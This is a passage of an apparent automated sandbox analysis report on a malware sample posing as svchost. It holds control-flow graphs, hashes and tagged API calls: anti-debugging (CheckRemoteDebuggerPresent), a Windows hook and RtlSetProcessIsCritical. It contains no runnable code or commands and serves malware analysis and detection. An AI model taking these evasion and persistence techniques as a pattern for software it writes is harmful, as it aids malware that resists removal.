                                                                    • Instruction Fuzzy Hash: C5F0A430A1DD5A4BD764BA2898416F9B3D5EF88364B600A39D54EC3382DE2CB84247C1
                                                                    Function 00007FF7C0CC0F3F Relevance: .0, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b24ca124b1083a418f45a3b8bb55cca60c07e55bc3bd5c88cd0c45cf43f264b6
                                                                    • Instruction ID: 101a87747f173bdaf264f42b745eb0865e1926710bfcc7d58640c503de9805e5
                                                                    • Opcode Fuzzy Hash: b24ca124b1083a418f45a3b8bb55cca60c07e55bc3bd5c88cd0c45cf43f264b6
                                                                    • Instruction Fuzzy Hash: 85E08611F18D0A4BE7A876AC68652F8A3C2DF88260F905179E10DC27C3DD19AC824251

                                                                    Execution Graph

                                                                    Execution Coverage:26.2%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:33.3%
                                                                    Total number of Nodes:9
                                                                    Total number of Limit Nodes:0

                                                                    Executed Functions

                                                                    Function 00007FF7C0CCE5B9 Relevance: 2.5, Strings: 1, Instructions: 1202COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 7ff7c0cce5b9-7ff7c0cce5f3 1 7ff7c0cce5f5-7ff7c0cce600 call 7ff7c0cc0a40 0->1 2 7ff7c0cce63d-7ff7c0cce645 0->2 6 7ff7c0cce605-7ff7c0cce63c 1->6 3 7ff7c0cce6bb 2->3 4 7ff7c0cce647-7ff7c0cce664 2->4 7 7ff7c0cce6c0-7ff7c0cce6d5 3->7 4->7 9 7ff7c0cce666-7ff7c0cce6b6 call 7ff7c0ccc250 4->9 6->2 13 7ff7c0cce6f3-7ff7c0cce708 7->13 14 7ff7c0cce6d7-7ff7c0cce6ee call 7ff7c0cc1228 call 7ff7c0cc0a50 7->14 34 7ff7c0ccf2fb-7ff7c0ccf309 9->34 21 7ff7c0cce73f-7ff7c0cce754 13->21 22 7ff7c0cce70a-7ff7c0cce73a call 7ff7c0cc1228 13->22 14->34 31 7ff7c0cce756-7ff7c0cce762 call 7ff7c0ccbdd8 21->31 32 7ff7c0cce767-7ff7c0cce77c 21->32 22->34 31->34 40 7ff7c0cce7c2-7ff7c0cce7d7 32->40 41 7ff7c0cce77e-7ff7c0cce781 32->41 47 7ff7c0cce818-7ff7c0cce82d 40->47 48 7ff7c0cce7d9-7ff7c0cce7dc 40->48 41->3 43 7ff7c0cce787-7ff7c0cce792 41->43 43->3 44 7ff7c0cce798-7ff7c0cce7bd call 7ff7c0cc0a28 call 7ff7c0ccbdd8 43->44 44->34 55 7ff7c0cce82f-7ff7c0cce832 47->55 56 7ff7c0cce85a-7ff7c0cce86f 47->56 48->3 49 7ff7c0cce7e2-7ff7c0cce7ed 48->49 49->3 51 7ff7c0cce7f3-7ff7c0cce813 call 7ff7c0cc0a28 call 7ff7c0ccad60 49->51 51->34 55->3 59 7ff7c0cce838-7ff7c0cce855 call 7ff7c0cc0a28 call 7ff7c0ccad68 55->59 64 7ff7c0cce875-7ff7c0cce8c1 call 7ff7c0cc09b0 56->64 65 7ff7c0cce947-7ff7c0cce95c 56->65 59->34 64->3 99 7ff7c0cce8c7-7ff7c0cce8ff call 7ff7c0cc7700 64->99 74 7ff7c0cce97b-7ff7c0cce990 65->74 75 7ff7c0cce95e-7ff7c0cce961 65->75 83 7ff7c0cce9b2-7ff7c0cce9c7 74->83 84 7ff7c0cce992-7ff7c0cce995 74->84 75->3 77 7ff7c0cce967-7ff7c0cce976 call 7ff7c0ccad40 75->77 77->34 90 7ff7c0cce9e7-7ff7c0cce9fc 83->90 91 7ff7c0cce9c9-7ff7c0cce9e2 83->91 84->3 85 7ff7c0cce99b-7ff7c0cce9ad call 7ff7c0ccad40 84->85 85->34 97 7ff7c0ccea1c-7ff7c0ccea31 90->97 98 7ff7c0cce9fe-7ff7c0ccea17 90->98 91->34 102 7ff7c0ccea33-7ff7c0ccea4c 97->102 103 7ff7c0ccea51-7ff7c0ccea66 97->103 98->34 99->3 116 7ff7c0cce905-7ff7c0cce942 call 7ff7c0ccbe08 99->116 102->34 108 7ff7c0ccea8f-7ff7c0cceaa4 103->108 109 7ff7c0ccea68-7ff7c0ccea6b 103->109 117 7ff7c0cceb44-7ff7c0cceb59 108->117 118 7ff7c0cceaaa-7ff7c0cceb22 108->118 109->3 111 7ff7c0ccea71-7ff7c0ccea8a 109->111 111->34 116->34 125 7ff7c0cceb71-7ff7c0cceb86 117->125 126 7ff7c0cceb5b-7ff7c0cceb6c 117->126 118->3 145 7ff7c0cceb28-7ff7c0cceb3f 118->145 131 7ff7c0ccec26-7ff7c0ccec3b 125->131 132 7ff7c0cceb8c-7ff7c0ccec04 125->132 126->34 138 7ff7c0ccec53-7ff7c0ccec68 131->138 139 7ff7c0ccec3d-7ff7c0ccec4e 131->139 132->3 161 7ff7c0ccec0a-7ff7c0ccec21 132->161 146 7ff7c0ccec9a-7ff7c0ccecaf 138->146 147 7ff7c0ccec6a-7ff7c0ccec95 call 7ff7c0cc0d40 call 7ff7c0ccc250 138->147 139->34 145->34 153 7ff7c0ccecb5-7ff7c0cced87 call 7ff7c0cc0d40 call 7ff7c0ccc250 146->153 154 7ff7c0cced8c-7ff7c0cceda1 146->154 147->34 153->34 163 7ff7c0cceda7-7ff7c0ccedaa 154->163 164 7ff7c0ccee68-7ff7c0ccee7d 154->164 161->34 165 7ff7c0ccedb0-7ff7c0ccedbb 163->165 166 7ff7c0ccee5d-7ff7c0ccee62 163->166 173 7ff7c0ccee7f-7ff7c0ccee8c call 7ff7c0ccc250 164->173 174 7ff7c0ccee91-7ff7c0cceea6 164->174 165->166 170 7ff7c0ccedc1-7ff7c0ccee5b call 7ff7c0cc0d40 call 7ff7c0ccc250 165->170 175 7ff7c0ccee63 166->175 170->175 173->34 183 7ff7c0ccef1d-7ff7c0ccef32 174->183 184 7ff7c0cceea8-7ff7c0cceeb9 174->184 175->34 191 7ff7c0ccef34-7ff7c0ccef37 183->191 192 7ff7c0ccef72-7ff7c0ccef87 183->192 184->3 189 7ff7c0cceebf-7ff7c0cceecf call 7ff7c0cc0a20 184->189 200 7ff7c0cceed1-7ff7c0cceef6 call 7ff7c0ccc250 189->200 201 7ff7c0cceefb-7ff7c0ccef18 call 7ff7c0cc0a20 call 7ff7c0cc0a28 call 7ff7c0ccad18 189->201 191->3 195 7ff7c0ccef3d-7ff7c0ccef6d call 7ff7c0cc0a18 call 7ff7c0cc0a28 call 7ff7c0ccad18 191->195 205 7ff7c0ccefcd-7ff7c0ccefe2 192->205 206 7ff7c0ccef89-7ff7c0ccefb6 call 7ff7c0cc8f50 call 7ff7c0cca150 192->206 195->34 200->34 201->34 221 7ff7c0ccf082-7ff7c0ccf097 205->221 222 7ff7c0ccefe8-7ff7c0ccf07d call 7ff7c0cc0d40 call 7ff7c0ccc250 205->222 235 7ff7c0ccefbb-7ff7c0ccefc8 call 7ff7c0ccad20 206->235 221->34 234 7ff7c0ccf09d-7ff7c0ccf0a4 221->234 222->34 240 7ff7c0ccf0a6-7ff7c0ccf0b0 call 7ff7c0ccbe18 234->240 241 7ff7c0ccf0b7-7ff7c0ccf1d1 call 7ff7c0ccbe28 call 7ff7c0ccbe38 call 7ff7c0ccbe48 call 7ff7c0ccbe58 call 7ff7c0cc9fe0 call 7ff7c0ccbe68 call 7ff7c0ccbe38 call 7ff7c0ccbe48 234->241 235->34 240->241 289 7ff7c0ccf1d3-7ff7c0ccf1d7 241->289 290 7ff7c0ccf242-7ff7c0ccf251 241->290 291 7ff7c0ccf258-7ff7c0ccf2fa call 7ff7c0cc0d40 call 7ff7c0cc0a30 call 7ff7c0ccc250 289->291 292 7ff7c0ccf1d9-7ff7c0ccf22a call 7ff7c0ccbe78 call 7ff7c0ccbe88 289->292 290->291 291->34 301 7ff7c0ccf22f-7ff7c0ccf238 292->301 301->290
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 4bc06908303691444f194ea3405cfe3f6ef28d5f03b956578d2eacfacaab4c5c
                                                                    • Instruction ID: 16941716885358a359be0ff8da83dfe4e2d23c9618885619a423a98dc5ae9ce6
                                                                    • Opcode Fuzzy Hash: 4bc06908303691444f194ea3405cfe3f6ef28d5f03b956578d2eacfacaab4c5c
                                                                    • Instruction Fuzzy Hash: 93825520A1C91A4BEB64FB68C4556B9B3D2EF99360FA45578D10EC73C3DE28F8428791
                                                                    Function 00007FF7C0CC1290 Relevance: 2.0, Strings: 1, Instructions: 753COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 317 7ff7c0cc1290-7ff7c0cc170b 319 7ff7c0cc170d-7ff7c0cc1715 317->319 320 7ff7c0cc177c-7ff7c0cc1885 call 7ff7c0cc0638 * 7 call 7ff7c0cc0a48 317->320 352 7ff7c0cc188f-7ff7c0cc1906 call 7ff7c0cc04b8 call 7ff7c0cc04b0 call 7ff7c0cc0358 call 7ff7c0cc0368 320->352 353 7ff7c0cc1887-7ff7c0cc188e 320->353 368 7ff7c0cc1919-7ff7c0cc1929 352->368 369 7ff7c0cc1908-7ff7c0cc1912 352->369 353->352 372 7ff7c0cc1951-7ff7c0cc1971 368->372 373 7ff7c0cc192b-7ff7c0cc194a call 7ff7c0cc0358 368->373 369->368 379 7ff7c0cc1982-7ff7c0cc19ad 372->379 380 7ff7c0cc1973-7ff7c0cc197d call 7ff7c0cc0378 372->380 373->372 385 7ff7c0cc19af-7ff7c0cc19b9 379->385 386 7ff7c0cc19ba-7ff7c0cc19e6 call 7ff7c0cc1038 379->386 380->379 385->386 392 7ff7c0cc1a86-7ff7c0cc1b14 386->392 393 7ff7c0cc19ec-7ff7c0cc1a81 386->393 412 7ff7c0cc1b1b-7ff7c0cc1c59 call 7ff7c0cc0870 call 7ff7c0cc1288 call 7ff7c0cc0388 call 7ff7c0cc0398 392->412 393->412 436 7ff7c0cc1ca7-7ff7c0cc1cda 412->436 437 7ff7c0cc1c5b-7ff7c0cc1c8e 412->437 447 7ff7c0cc1cff-7ff7c0cc1d2f 436->447 448 7ff7c0cc1cdc-7ff7c0cc1cfd 436->448 437->436 444 7ff7c0cc1c90-7ff7c0cc1c9d 437->444 444->436 449 7ff7c0cc1c9f-7ff7c0cc1ca5 444->449 451 7ff7c0cc1d37-7ff7c0cc1d6e 447->451 448->451 449->436 457 7ff7c0cc1d70-7ff7c0cc1d91 451->457 458 7ff7c0cc1d93-7ff7c0cc1dc3 451->458 460 7ff7c0cc1dcb-7ff7c0cc1ead call 7ff7c0cc03a8 call 7ff7c0cc09e8 call 7ff7c0cc1038 457->460 458->460 477 7ff7c0cc1eaf call 7ff7c0cc1220 460->477 478 7ff7c0cc1eb4-7ff7c0cc1f5f 460->478 477->478 489 7ff7c0cc1f66-7ff7c0cc1f7e 478->489
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CAO_^
                                                                    • API String ID: 0-3111533842
                                                                    • Opcode ID: 9c8e2a73369b6c4afd1f7aa17c2031eba0c6030ce07e10ca65eb06fe9e35604d
                                                                    • Instruction ID: 028d426fc554f182fca6bae1325905d889a38a2c486c2342cee8acd84d2abed2
                                                                    • Opcode Fuzzy Hash: 9c8e2a73369b6c4afd1f7aa17c2031eba0c6030ce07e10ca65eb06fe9e35604d
                                                                    • Instruction Fuzzy Hash: 90327170B28A594BE798FB2CC4657B9B7D2FF98750F944579E40EC3392CE28B8418781
                                                                    Function 00007FF7C0CC1719 Relevance: 2.0, Strings: 1, Instructions: 707COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 491 7ff7c0cc1719-7ff7c0cc1750 492 7ff7c0cc1f7f-7ff7c0cc1fc6 491->492 493 7ff7c0cc1756-7ff7c0cc1780 call 7ff7c0cc0638 491->493 503 7ff7c0cc178c-7ff7c0cc1885 call 7ff7c0cc0638 * 6 call 7ff7c0cc0a48 493->503 504 7ff7c0cc1787 call 7ff7c0cc0638 493->504 534 7ff7c0cc188f-7ff7c0cc1906 call 7ff7c0cc04b8 call 7ff7c0cc04b0 call 7ff7c0cc0358 call 7ff7c0cc0368 503->534 535 7ff7c0cc1887-7ff7c0cc188e 503->535 504->503 550 7ff7c0cc1919-7ff7c0cc1929 534->550 551 7ff7c0cc1908-7ff7c0cc1912 534->551 535->534 554 7ff7c0cc1951-7ff7c0cc1971 550->554 555 7ff7c0cc192b-7ff7c0cc194a call 7ff7c0cc0358 550->555 551->550 561 7ff7c0cc1982-7ff7c0cc19ad 554->561 562 7ff7c0cc1973-7ff7c0cc197d call 7ff7c0cc0378 554->562 555->554 567 7ff7c0cc19af-7ff7c0cc19b9 561->567 568 7ff7c0cc19ba-7ff7c0cc19e6 call 7ff7c0cc1038 561->568 562->561 567->568 574 7ff7c0cc1a86-7ff7c0cc1b14 568->574 575 7ff7c0cc19ec-7ff7c0cc1a81 568->575 594 7ff7c0cc1b1b-7ff7c0cc1c59 call 7ff7c0cc0870 call 7ff7c0cc1288 call 7ff7c0cc0388 call 7ff7c0cc0398 574->594 575->594 618 7ff7c0cc1ca7-7ff7c0cc1cda 594->618 619 7ff7c0cc1c5b-7ff7c0cc1c8e 594->619 629 7ff7c0cc1cff-7ff7c0cc1d2f 618->629 630 7ff7c0cc1cdc-7ff7c0cc1cfd 618->630 619->618 626 7ff7c0cc1c90-7ff7c0cc1c9d 619->626 626->618 631 7ff7c0cc1c9f-7ff7c0cc1ca5 626->631 633 7ff7c0cc1d37-7ff7c0cc1d6e 629->633 630->633 631->618 639 7ff7c0cc1d70-7ff7c0cc1d91 633->639 640 7ff7c0cc1d93-7ff7c0cc1dc3 633->640 642 7ff7c0cc1dcb-7ff7c0cc1ead call 7ff7c0cc03a8 call 7ff7c0cc09e8 call 7ff7c0cc1038 639->642 640->642 659 7ff7c0cc1eaf call 7ff7c0cc1220 642->659 660 7ff7c0cc1eb4-7ff7c0cc1f5f 642->660 659->660 671 7ff7c0cc1f66-7ff7c0cc1f7e 660->671
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CAO_^
                                                                    • API String ID: 0-3111533842
                                                                    • Opcode ID: cb07c410053d39a9e47b346ed7f261968e126bc846fa6602f06672fe7046b38c
                                                                    • Instruction ID: 2f911dd600b015382d0b123cbd04c30dd09acfdb29841c3424b6e99d03fd7f8f
                                                                    • Opcode Fuzzy Hash: cb07c410053d39a9e47b346ed7f261968e126bc846fa6602f06672fe7046b38c
                                                                    • Instruction Fuzzy Hash: 5E228271B18A494FE798FB28C4657B9B7D2FF89760F940579E40EC3392CE28B8418781
                                                                    Function 00007FF7C0CC7A81 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 764 7ff7c0cc7a81-7ff7c0cc7b3d CheckRemoteDebuggerPresent 767 7ff7c0cc7b3f 764->767 768 7ff7c0cc7b45-7ff7c0cc7b88 764->768 767->768
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CheckDebuggerPresentRemote
                                                                    • String ID:
                                                                    • API String ID: 3662101638-0
                                                                    • Opcode ID: b369ecb014a6fa52425c99dfc2f1a70f0b8a2e613c609c3011ed6d4a3b96ac97
                                                                    • Instruction ID: 0da37f1fef343b58e045278cf5b5f6d96dfaac6b627b7846f5ea7be588b2d08c
                                                                    • Opcode Fuzzy Hash: b369ecb014a6fa52425c99dfc2f1a70f0b8a2e613c609c3011ed6d4a3b96ac97
                                                                    • Instruction Fuzzy Hash: D431037190875C8FCB58DF58C88A7E9BBE0FF65311F05426BD489D7252CB34A846CB91
                                                                    Function 00007FF7C0CC60C6 Relevance: .5, Instructions: 473COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 880 7ff7c0cc60c6-7ff7c0cc60d3 881 7ff7c0cc60d5-7ff7c0cc60dd 880->881 882 7ff7c0cc60de-7ff7c0cc61a7 880->882 881->882 885 7ff7c0cc6213 882->885 886 7ff7c0cc61a9-7ff7c0cc61b2 882->886 887 7ff7c0cc6215-7ff7c0cc623a 885->887 886->885 888 7ff7c0cc61b4-7ff7c0cc61c0 886->888 895 7ff7c0cc62a6 887->895 896 7ff7c0cc623c-7ff7c0cc6245 887->896 889 7ff7c0cc61c2-7ff7c0cc61d4 888->889 890 7ff7c0cc61f9-7ff7c0cc6211 888->890 891 7ff7c0cc61d6 889->891 892 7ff7c0cc61d8-7ff7c0cc61eb 889->892 890->887 891->892 892->892 894 7ff7c0cc61ed-7ff7c0cc61f5 892->894 894->890 897 7ff7c0cc62a8-7ff7c0cc6350 895->897 896->895 898 7ff7c0cc6247-7ff7c0cc6253 896->898 909 7ff7c0cc6352-7ff7c0cc635c 897->909 910 7ff7c0cc63be 897->910 899 7ff7c0cc6255-7ff7c0cc6267 898->899 900 7ff7c0cc628c-7ff7c0cc62a4 898->900 902 7ff7c0cc6269 899->902 903 7ff7c0cc626b-7ff7c0cc627e 899->903 900->897 902->903 903->903 905 7ff7c0cc6280-7ff7c0cc6288 903->905 905->900 909->910 912 7ff7c0cc635e-7ff7c0cc636b 909->912 911 7ff7c0cc63c0-7ff7c0cc63e9 910->911 918 7ff7c0cc6453 911->918 919 7ff7c0cc63eb-7ff7c0cc63f6 911->919 913 7ff7c0cc63a4-7ff7c0cc63bc 912->913 914 7ff7c0cc636d-7ff7c0cc637f 912->914 913->911 916 7ff7c0cc6381 914->916 917 7ff7c0cc6383-7ff7c0cc6396 914->917 916->917 917->917 920 7ff7c0cc6398-7ff7c0cc63a0 917->920 922 7ff7c0cc6455-7ff7c0cc64e6 918->922 919->918 921 7ff7c0cc63f8-7ff7c0cc6406 919->921 920->913 923 7ff7c0cc643f-7ff7c0cc6451 921->923 924 7ff7c0cc6408-7ff7c0cc641a 921->924 930 7ff7c0cc64ec-7ff7c0cc64fb 922->930 923->922 925 7ff7c0cc641e-7ff7c0cc6431 924->925 926 7ff7c0cc641c 924->926 925->925 928 7ff7c0cc6433-7ff7c0cc643b 925->928 926->925 928->923 931 7ff7c0cc6503-7ff7c0cc6568 call 7ff7c0cc6584 930->931 932 7ff7c0cc64fd 930->932 939 7ff7c0cc656f-7ff7c0cc6583 931->939 940 7ff7c0cc656a 931->940 932->931 940->939
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b983dd788394912464f8d5bc5db2d2d9e51d7084fe027f741d9422060d52b4f
                                                                    • Instruction ID: b66e3cc219fd6e9afd59a4ad74797659e2d152d8f798aac12488d80da8bc38c5
                                                                    • Opcode Fuzzy Hash: 6b983dd788394912464f8d5bc5db2d2d9e51d7084fe027f741d9422060d52b4f
                                                                    • Instruction Fuzzy Hash: F4F1A530908A8E8FEBA8EF28C8557E977D1FF54310F44426EE84DC7396DB74A9458B81
                                                                    Function 00007FF7C0CC6E72 Relevance: .5, Instructions: 459COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 941 7ff7c0cc6e72-7ff7c0cc6e7f 942 7ff7c0cc6e81-7ff7c0cc6e89 941->942 943 7ff7c0cc6e8a-7ff7c0cc6f57 941->943 942->943 946 7ff7c0cc6fc3 943->946 947 7ff7c0cc6f59-7ff7c0cc6f62 943->947 948 7ff7c0cc6fc5-7ff7c0cc6fea 946->948 947->946 949 7ff7c0cc6f64-7ff7c0cc6f70 947->949 956 7ff7c0cc7056 948->956 957 7ff7c0cc6fec-7ff7c0cc6ff5 948->957 950 7ff7c0cc6f72-7ff7c0cc6f84 949->950 951 7ff7c0cc6fa9-7ff7c0cc6fc1 949->951 953 7ff7c0cc6f86 950->953 954 7ff7c0cc6f88-7ff7c0cc6f9b 950->954 951->948 953->954 954->954 955 7ff7c0cc6f9d-7ff7c0cc6fa5 954->955 955->951 959 7ff7c0cc7058-7ff7c0cc707d 956->959 957->956 958 7ff7c0cc6ff7-7ff7c0cc7003 957->958 960 7ff7c0cc7005-7ff7c0cc7017 958->960 961 7ff7c0cc703c-7ff7c0cc7054 958->961 965 7ff7c0cc707f-7ff7c0cc7089 959->965 966 7ff7c0cc70eb 959->966 963 7ff7c0cc7019 960->963 964 7ff7c0cc701b-7ff7c0cc702e 960->964 961->959 963->964 964->964 967 7ff7c0cc7030-7ff7c0cc7038 964->967 965->966 968 7ff7c0cc708b-7ff7c0cc7098 965->968 969 7ff7c0cc70ed-7ff7c0cc711b 966->969 967->961 970 7ff7c0cc70d1-7ff7c0cc70e9 968->970 971 7ff7c0cc709a-7ff7c0cc70ac 968->971 976 7ff7c0cc711d-7ff7c0cc7128 969->976 977 7ff7c0cc718b 969->977 970->969 972 7ff7c0cc70b0-7ff7c0cc70c3 971->972 973 7ff7c0cc70ae 971->973 972->972 975 7ff7c0cc70c5-7ff7c0cc70cd 972->975 973->972 975->970 976->977 979 7ff7c0cc712a-7ff7c0cc7138 976->979 978 7ff7c0cc718d-7ff7c0cc7265 977->978 989 7ff7c0cc726b-7ff7c0cc727a 978->989 980 7ff7c0cc7171-7ff7c0cc7189 979->980 981 7ff7c0cc713a-7ff7c0cc714c 979->981 980->978 983 7ff7c0cc7150-7ff7c0cc7163 981->983 984 7ff7c0cc714e 981->984 983->983 985 7ff7c0cc7165-7ff7c0cc716d 983->985 984->983 985->980 990 7ff7c0cc7282-7ff7c0cc72e4 call 7ff7c0cc7300 989->990 991 7ff7c0cc727c 989->991 998 7ff7c0cc72e6 990->998 999 7ff7c0cc72eb-7ff7c0cc72ff 990->999 991->990 998->999
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aa6d09fd29786eb4b09ff5d431d98bb67bf9b11d4f25ce20206cf719a0b05196
                                                                    • Instruction ID: d91c6d357b8d03b877bdaf5be0cc59b5800fde4c064634a8509c2c90c094df61
                                                                    • Opcode Fuzzy Hash: aa6d09fd29786eb4b09ff5d431d98bb67bf9b11d4f25ce20206cf719a0b05196
                                                                    • Instruction Fuzzy Hash: 2FE1B130908A4E8FEBA8EF28C8557E977D1FF54310F44426EE84DC7291CF78A9558B81
                                                                    Function 00007FF7C0CC20F1 Relevance: .2, Instructions: 208COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc35bf8859e97ab19ab55cf65776a54db19a489143e07e1b098cd722b10c1af7
                                                                    • Instruction ID: 4fc7145804060db6d66c8e9fa5fd62debcd6978fe63846a7b245d1e6238b835a
                                                                    • Opcode Fuzzy Hash: fc35bf8859e97ab19ab55cf65776a54db19a489143e07e1b098cd722b10c1af7
                                                                    • Instruction Fuzzy Hash: 48511520A1D6C54FD756AB7C98642B9BFD5DF87225B0801FBE089C7293DE186C46C352
                                                                    Function 00007FF7C0CC9DA8 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 673 7ff7c0cc9da8-7ff7c0cc9daf 674 7ff7c0cc9db1-7ff7c0cc9db9 673->674 675 7ff7c0cc9dba-7ff7c0cc9e2d 673->675 674->675 678 7ff7c0cc9e33-7ff7c0cc9e40 675->678 679 7ff7c0cc9eb9-7ff7c0cc9ebd 675->679 680 7ff7c0cc9e42-7ff7c0cc9e7f SetWindowsHookExW 678->680 679->680 682 7ff7c0cc9e81 680->682 683 7ff7c0cc9e87-7ff7c0cc9eb8 680->683 682->683
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 2f40e1c88fed171d4150196c04c7a34b07f663a32d909aec0b4b0de4fb1ffc6f
                                                                    • Instruction ID: acb827f24bbcf4f8eaf0026f45cbbd9e612d6e87a32c1703f455037981560fb6
                                                                    • Opcode Fuzzy Hash: 2f40e1c88fed171d4150196c04c7a34b07f663a32d909aec0b4b0de4fb1ffc6f
                                                                    • Instruction Fuzzy Hash: 0F31B43091CA598FDB18EF6C98466F9BBE1EB69321F10426ED049C3292CB65B812C7C1
                                                                    Function 00007FF7C0CC9885 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 686 7ff7c0cc9885-7ff7c0cc9960 RtlSetProcessIsCritical 691 7ff7c0cc9962 686->691 692 7ff7c0cc9968-7ff7c0cc999d 686->692 691->692
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalProcess
                                                                    • String ID:
                                                                    • API String ID: 2695349919-0
                                                                    • Opcode ID: ea1ce93316e2a461321133ae21c8c438eea8b323920a4647b5e35707029146b1
                                                                    • Instruction ID: 20b954ef458d85c87d473d0820de54abc04105810f15d6fd9535f72069de3a7c
                                                                    • Opcode Fuzzy Hash: ea1ce93316e2a461321133ae21c8c438eea8b323920a4647b5e35707029146b1
                                                                    • Instruction Fuzzy Hash: DE41C33190CB888FD729DF68D8556E9BBF0FF56311F14016ED08AD3692CB74684ACB91

                                                                    Non-executed Functions

                                                                    Function 00007FF7C0CC10A5 Relevance: .2, Instructions: 193COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2803540424.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff7c0cc0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c44b0ec949002fbb839bfed749ec3c68797c3d891a28fc21a6df58e7d47f2886
                                                                    • Instruction ID: 99bc7673161a35c43ee4dc575e669ab9442620536151127fe21f5de8914aecf1
                                                                    • Opcode Fuzzy Hash: c44b0ec949002fbb839bfed749ec3c68797c3d891a28fc21a6df58e7d47f2886
                                                                    • Instruction Fuzzy Hash: B151272BA0C53257D32177BEB8426E97B54EF927B57088177D64CCD2838F08349A86E9

                                                                    Non-executed Functions

